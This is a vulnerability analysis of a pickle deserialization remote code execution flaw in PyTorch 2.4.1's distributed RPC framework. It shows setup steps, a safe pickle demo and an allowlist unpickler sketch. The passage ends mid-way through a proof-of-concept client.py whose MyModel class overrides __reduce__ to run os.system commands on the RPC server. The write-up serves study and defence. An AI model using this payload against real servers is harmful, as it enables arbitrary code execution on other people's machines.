Analysis of PyTorch library RPC framework deserialization RCE vulnerability (CVE


Introduction

This article analyzes the root cause of the arbitrary code execution vulnerability triggered by pickle deserialization in the PyTorch distributed RPC framework.
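The underlying pickle behavior can be shown in isolation, without PyTorch. The following is a minimal sketch, not the exploit itself: the class name `Payload` is hypothetical, and the harmless `os.getcwd` stands in for a dangerous callable such as `os.system`. It shows that the unpickler calls whatever callable `__reduce__` returned, so the receiver gets that call's result rather than the original object.

```python
import os
import pickle


class Payload:
    """Hypothetical object whose pickled form tells the unpickler to call a function."""

    def __reduce__(self):
        # pickle records this (callable, args) pair in the byte stream.
        # os.getcwd is a harmless stand-in for something like os.system.
        return (os.getcwd, ())


data = pickle.dumps(Payload())  # __reduce__ runs here, on the sending side
result = pickle.loads(data)     # os.getcwd runs here, on the receiving side

# The receiver never gets a Payload back, only the callable's return value.
print(type(result).__name__, result)
```

Any process that unpickles attacker-controlled bytes therefore runs a callable of the attacker's choosing, which is the pattern this analysis traces through the RPC framework.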

Environment setup and reproduction

  1. Create a virtual environment using conda

    image-20241105102706402.png

  2. Install PyTorch version 2.4.1 using pip

    image-20241105102740281.png

  3. Create server.py and client.py separately

    server.py creates a distributed RPC service that can handle remote procedure call requests from clients

    # server.py
    import torch
    import torch.distributed.rpc as rpc
    
    def run_server():
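        # Initialize server-side RPC; with the default env:// rendezvous,
        # MASTER_ADDR and MASTER_PORT must be set in the environment
        rpc.init_rpc("server", rank=0, world_size=2)
    
        # Block until all RPC workers are done; the client's remote calls are served meanwhile
        rpc.shutdown()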
    
    if __name__ == "__main__":
        run_server()
    

    image-20241105102840555.png

    client.py initiates RPC communication and defines a simple neural network model, MyModel, which overrides the __reduce__ method. The callable that __reduce__ returns is invoked when the object is deserialized, and the framework does not filter it, so the malicious code is executed.
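For contrast, the kind of filtering that is missing can be sketched with the standard library's `pickle.Unpickler.find_class` hook. This is only an illustration under stated assumptions, not PyTorch code or a proposed patch: the names `AllowlistUnpickler`, `restricted_loads`, and `Payload`, and the contents of the allowlist, are all hypothetical.

```python
import io
import os
import pickle


class AllowlistUnpickler(pickle.Unpickler):
    # Hypothetical allowlist of (module, name) pairs the stream may reference.
    ALLOWED = {("builtins", "list"), ("builtins", "dict"), ("builtins", "set")}

    def find_class(self, module, name):
        # Called whenever the pickle stream references a global by name.
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global: {module}.{name}")


def restricted_loads(data: bytes):
    """Unpickle data, refusing any global outside the allowlist."""
    return AllowlistUnpickler(io.BytesIO(data)).load()


class Payload:
    def __reduce__(self):
        # Harmless stand-in for os.system; still a global reference.
        return (os.getcwd, ())


blocked = False
try:
    restricted_loads(pickle.dumps(Payload()))
except pickle.UnpicklingError:
    blocked = True  # the reference to os.getcwd was rejected before any call

# Plain containers of primitives need no globals and still load.
plain = restricted_loads(pickle.dumps({"weights": [1.0, 2.0]}))
print(blocked, plain)
```

An allowlist like this rejects the payload before its callable is ever invoked, whereas an unfiltered unpickler resolves and calls it.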

    # client.py
    import torch
    import torch.distributed.rpc as rpc
    from torch.distributed.nn.api.remote_module import RemoteModule
    import torch.nn as nn
    
    # Define a simple neural network model MyModel
    class MyModel(nn.Module):
        def __init__(self):
            super(MyModel, self).__init__()
            # A simple linear layer with input dimension 2 and output dimension 2
            self.fc = nn.Linear(2, 2)
    
        # Override __reduce__: the callable returned here is invoked when the object is unpickled
        def __reduce__(self):
            return (__import__('os').system, ("id;ls",))
    
    def run_client():
        # Initialize client-side RPC
        rpc.init_rpc("client", rank=1, world_size=2)
    
        # Create a remote module to run the model on the server side
        remote_model = RemoteModule(
            "server",  # Serve